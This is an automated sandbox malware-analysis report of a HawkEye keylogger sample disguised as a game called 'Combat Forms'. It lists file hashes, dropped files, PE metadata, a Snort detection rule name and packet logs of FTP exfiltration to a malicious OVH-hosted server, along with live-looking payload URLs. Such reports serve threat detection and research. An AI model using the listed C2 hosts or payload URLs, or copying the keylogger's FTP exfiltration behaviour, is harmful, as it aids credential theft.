                                                                                                                                                http://www.tiro.comtDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://www.carterandcone.com6tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269954755.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268801782.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268343485.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://www.founder.ctDb0ggawON.exe, 00000000.00000003.263370600.000000000886C000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.263539092.0000000008872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://www.goodfont.co.krtDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.pngbhvED7C.tmp.14.drfalse
                                                                                                                                                  		high

                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public IPs

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  66.70.204.222
                                                                                                                                                  		ftp.manchutimefashion.comCanada
                                                                                                                                                  		16276OVHFRtrue

                                                                                                                                                  Private

                                                                                                                                                  IP
                                                                                                                                                  192.168.2.1

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                  Analysis ID:571678
                                                                                                                                                  Start date:14.02.2022
                                                                                                                                                  Start time:09:42:19
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 10m 44s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:tDb0ggawON (renamed file extension from none to exe)
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Number of analysed new started processes analysed:25
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.phis.troj.spyw.evad.winEXE@7/5@2/2
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 8.6% (good quality ratio 7.6%)
                                                                                                                                                  • Quality average: 74.8%
                                                                                                                                                  • Quality standard deviation: 33.6%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 97%
                                                                                                                                                  • Number of executed functions: 152
                                                                                                                                                  • Number of non-executed functions: 290
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI

                                                                                                                                                  Warnings

                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                                                                                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  09:43:40API Interceptor6x Sleep call for process: tDb0ggawON.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  66.70.204.222Dolmas.xlsm.exeGet hashmaliciousBrowse
                                                                                                                                                  • tesla-com.tk/Awele/SINOPHIL@LOKIRAW_HGiTKz109.bin
                                                                                                                                                  eurobank.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • tesla-com.tk/ford/SINOPHIL@LOKIRAW_GCLYOSF135.bin

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  ftp.manchutimefashion.com02132022769992.docGet hashmaliciousBrowse
                                                                                                                                                  • 66.70.204.222

                                                                                                                                                  ASNs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  OVHFRlsass.exeGet hashmaliciousBrowse
                                                                                                                                                  • 51.79.226.3
                                                                                                                                                  6F2EKlap31.exeGet hashmaliciousBrowse
                                                                                                                                                  • 213.186.33.5
                                                                                                                                                  ZXAAhPUFkw.exeGet hashmaliciousBrowse
                                                                                                                                                  • 51.91.236.255
                                                                                                                                                  02132022769992.docGet hashmaliciousBrowse
                                                                                                                                                  • 66.70.204.222
                                                                                                                                                  XdokgkT8a7.exeGet hashmaliciousBrowse
                                                                                                                                                  • 213.186.33.5
                                                                                                                                                  esaFGnQ1rW.exeGet hashmaliciousBrowse
                                                                                                                                                  • 158.69.144.161
                                                                                                                                                  0gnf7DCu6U.exeGet hashmaliciousBrowse
                                                                                                                                                  • 51.38.92.34
                                                                                                                                                  KTS Full.exeGet hashmaliciousBrowse
                                                                                                                                                  • 94.23.1.92
                                                                                                                                                  8891.PDF.vbsGet hashmaliciousBrowse
                                                                                                                                                  • 198.50.177.251
                                                                                                                                                  SpaIJRDurhGet hashmaliciousBrowse
                                                                                                                                                  • 139.99.9.190
                                                                                                                                                  Remittance Advice 2994718.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 188.165.135.185
                                                                                                                                                  fdwE1cx1cL.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.38.242.185
                                                                                                                                                  Swift Copy.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 87.98.245.200
                                                                                                                                                  jung-suk.goo-2102022 84828 p.m..htmlGet hashmaliciousBrowse
                                                                                                                                                  • 54.39.104.158
                                                                                                                                                  gkBMCovDLyGet hashmaliciousBrowse
                                                                                                                                                  • 164.133.191.143
                                                                                                                                                  MJ8bpUoROHGet hashmaliciousBrowse
                                                                                                                                                  • 149.56.71.193
                                                                                                                                                  ZtYNQ1ZX9zGet hashmaliciousBrowse
                                                                                                                                                  • 37.187.76.126
                                                                                                                                                  adP3gvhbFy.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 158.69.222.101
                                                                                                                                                  CZ20sNTjueGet hashmaliciousBrowse
                                                                                                                                                  • 37.59.96.102
                                                                                                                                                  test.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.95.56.148

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tDb0ggawON.exe.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\tDb0ggawON.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1216
                                                                                                                                                  Entropy (8bit):5.355304211458859
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bhvED7C.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x00a6e44f, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):26738688
                                                                                                                                                  Entropy (8bit):0.9806981969474944
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:NNLv1SxfFUp2+se9zZi2Ou/iDyU6joEO3PX2BU:+Up2YzU2Ouv
                                                                                                                                                  MD5:E8B291DF74287AB07DE3B67EBE00939F
                                                                                                                                                  SHA1:974061748D9603D45A1D6CDB54DCF6AC7BDBE75F
                                                                                                                                                  SHA-256:18816E6459D8EF754B27400E5A344B23074A41891D0C2B73742B23FB084F3A9C
                                                                                                                                                  SHA-512:E9AC83D445C6287260F60F581DB1EE6DD06EB9029E35022891743ECA54027AEF8E008FDD2ED0AD7B37032C5C65AAD874AD318E2739DE700644F23186CB0B64E0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:...O... .......v1.......l~.."...wK.......................m......+...z...+...z..h.o..........................k.\."...w..............................................................................................Y............B.................................................................................................................. ........+...z.......................................................................................................................................................................................................................................,'h.+...z...................-..#+...z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\holderwb.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2
                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:..

                                                                                                                                                  C:\Users\user\AppData\Roaming\pid.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\tDb0ggawON.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4
                                                                                                                                                  Entropy (8bit):1.5
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:XU:E
                                                                                                                                                  MD5:291D43C696D8C3704CDBE0A72ADE5F6C
                                                                                                                                                  SHA1:D7B9E40E0388ED17C5D4E9C758D1516226C03B4F
                                                                                                                                                  SHA-256:1E320CF3281868C2CD0CF78C688EBDE71C6C03BC9A43D8E91CB962CCD83C2AB2
                                                                                                                                                  SHA-512:55D78E26E7499EDCB2AC9619C2F84673FF83A7AFE698B31772FE665C19148876EF24DDFC88041FC3B33FB1D7ED80D395107E197B410300153854CE472E8C35A0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:3536

                                                                                                                                                  C:\Users\user\AppData\Roaming\pidloc.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\tDb0ggawON.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):38
                                                                                                                                                  Entropy (8bit):4.353190671338323
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:oNUWJRWRhIC2n:oNNJAor
                                                                                                                                                  MD5:6EB3124F9FDB61444C06578D83A66F24
                                                                                                                                                  SHA1:FC271EA7F2292C03B0855F466948BB718042AC03
                                                                                                                                                  SHA-256:B0AF16E4F2875581DC2360CEFE63D1AA75D533D56631BBC2A7133BE8307605F7
                                                                                                                                                  SHA-512:6627BBE908A4BC6FA4F75E5F00CEB3684596416749854A21B7435A0BB711A3DBDCB783D120BC83FDAFF8708B77438793DB83E0FCE190AC4F5D5A3F5D3D3125C2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:C:\Users\user\Desktop\tDb0ggawON.exe

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Entropy (8bit):7.841876304894837
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                  File name:tDb0ggawON.exe
                                                                                                                                                  File size:1244160
                                                                                                                                                  MD5:91de6efc69676a4dd4ced5e2111ab489
                                                                                                                                                  SHA1:262f23feee502e24d6d044c05bcb7b3153b3920e
                                                                                                                                                  SHA256:57754827b4e179d20088be1aa0fec9d1f8e3a872e81103b2c7264f80a0a86b36
                                                                                                                                                  SHA512:a138dd6d2645729104de1fd312d2240e3440706c8bb08dd127be04cb703ad1aceef69b5a26f49b4b314b63d9fa750c1ff242f3b09c80d1b9f7fb76e8f88f236f
                                                                                                                                                  SSDEEP:12288:zOTIkOQC3u4diHquSEbVziIN8cmGIhUGAVigEnKQHmlNhcoHnMaTvcXw8AKT/arK:oeMxSoTSTGZihnKQHToHnHEXw8BT/
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q..b..............0.................. ... ....@.. .......................`............@................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x530ebe
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                  Time Stamp:0x62098671 [Sun Feb 13 22:30:09 2022 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                                                                  OS Version Major:4
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:4
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x130e6c0x4f.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1320000x658.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1340000xc.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x20000x12eec40x12f000False0.903467763769data7.84726885826IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rsrc0x1320000x6580x800False0.337890625data3.51662278284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0x1340000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                  RT_VERSION0x1320a00x3ccdata
                                                                                                                                                  RT_MANIFEST0x13246c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                                                  Version Infos

                                                                                                                                                  DescriptionData
                                                                                                                                                  Translation0x0000 0x04b0
                                                                                                                                                  LegalCopyrightCopyright Academy of Interactive Entertainment 2017
                                                                                                                                                  Assembly Version1.0.0.0
                                                                                                                                                  InternalNameResourceHelp.exe
                                                                                                                                                  FileVersion1.0.0.0
                                                                                                                                                  CompanyNameAcademy of Interactive Entertainment
                                                                                                                                                  LegalTrademarks
                                                                                                                                                  Comments
                                                                                                                                                  ProductNameCombat Forms
                                                                                                                                                  ProductVersion1.0.0.0
                                                                                                                                                  FileDescriptionCombat Forms
                                                                                                                                                  OriginalFilenameResourceHelp.exe

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  02/14/22-09:44:15.960774TCP2020410ET TROJAN HawkEye Keylogger FTP4977021192.168.2.566.70.204.222

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Feb 14, 2022 09:44:15.039529085 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.139909029 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:15.140108109 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.240664005 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:15.241769075 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.341840982 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:15.341878891 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:15.342132092 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.456659079 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:15.457036018 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.557804108 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:15.558413029 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.658602953 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:15.658891916 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.758956909 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:15.759217978 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.859291077 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:15.860110998 CET4977157948192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.907032967 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.960406065 CET579484977166.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:15.960516930 CET4977157948192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:15.960773945 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:16.060944080 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:16.061367035 CET4977157948192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:16.063394070 CET4977157948192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:16.064482927 CET4977157948192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:16.110172033 CET4977021192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:16.161698103 CET579484977166.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:16.163667917 CET579484977166.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:16.164700031 CET579484977166.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:16.164793015 CET4977157948192.168.2.566.70.204.222
                                                                                                                                                  Feb 14, 2022 09:44:16.164796114 CET214977066.70.204.222192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:16.219578981 CET4977021192.168.2.566.70.204.222

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Feb 14, 2022 09:43:52.948479891 CET6217653192.168.2.58.8.8.8
